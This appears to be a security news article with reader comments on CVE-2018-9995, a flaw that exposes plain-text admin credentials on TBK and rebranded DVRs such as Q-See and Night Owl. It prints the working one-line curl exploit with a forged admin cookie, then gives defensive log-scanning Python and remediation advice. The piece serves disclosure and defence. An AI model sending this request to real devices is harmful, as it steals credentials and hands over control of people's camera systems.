Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is outlined in CVE-2018-9995.
The DVRs affected are manufactured by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple curl command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).

The plain text credentials returned from this command granted admin access to the device.
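
For defenders, the request shown above has a fixed shape that can be hunted for in web proxy or reverse-proxy access logs. The following Python is an added example, not code from IPVM or the researcher; it assumes logs in common/combined log format, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: client, timestamp, request line, status.
# The Cookie header is normally not logged, so match on path and query only.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def is_cred_list_request(target):
    """True when the target is device.rsp with opt=user and cmd=list."""
    parts = urlsplit(target)  # accepts origin-form and absolute-form targets
    if not unquote(parts.path).lower().endswith("/device.rsp"):
        return False
    # parse_qs percent-decodes values, so encoded variants still match;
    # parameter order and letter case are ignored.
    query = {k.lower(): [v.lower() for v in vs]
             for k, vs in parse_qs(parts.query).items()}
    return "user" in query.get("opt", []) and "list" in query.get("cmd", [])

def scan(lines):
    """Return one finding per matching request; 'answered' means HTTP 200."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cred_list_request(m["target"]):
            findings.append({"client": m["client"], "time": m["ts"],
                             "answered": m["status"] == "200"})
    return findings

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/May/2018:20:31:02 +0000] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 412',
    '198.51.100.7 - - [03/May/2018:20:31:05 +0000] "GET /index.html HTTP/1.1" 200 1893',
    '203.0.113.9 - - [03/May/2018:20:40:11 +0000] "GET /device.rsp?cmd=LIST&x=1&opt=%75ser HTTP/1.1" 200 412',
    '203.0.113.9 - - [03/May/2018:20:40:15 +0000] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 403 0',
    '192.0.2.44 - - [03/May/2018:20:41:00 +0000] "GET /device.rsp?opt=other&cmd=list HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        state = "device answered (HTTP 200)" if f["answered"] else "blocked or failed"
        print(f'{f["time"]}  {f["client"]}  {state}')
```

A finding with an HTTP 200 response is the case to treat as a credential exposure: rotate the DVR's passwords and remove the device's web interface from untrusted networks.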
opt=user&cmd=list
Obviously they really tried hard to hide this backdoor ;)
Do they have a business presence in the US?

TBK is a Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Costco, and more.

05/03/18 08:31pm
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?

05/10/18 08:06pm
Manufactured by TBK, a Spanish company? Are they really manufactured in a Spanish country?
Those DVRs were designed and manufactured by Streamax, China.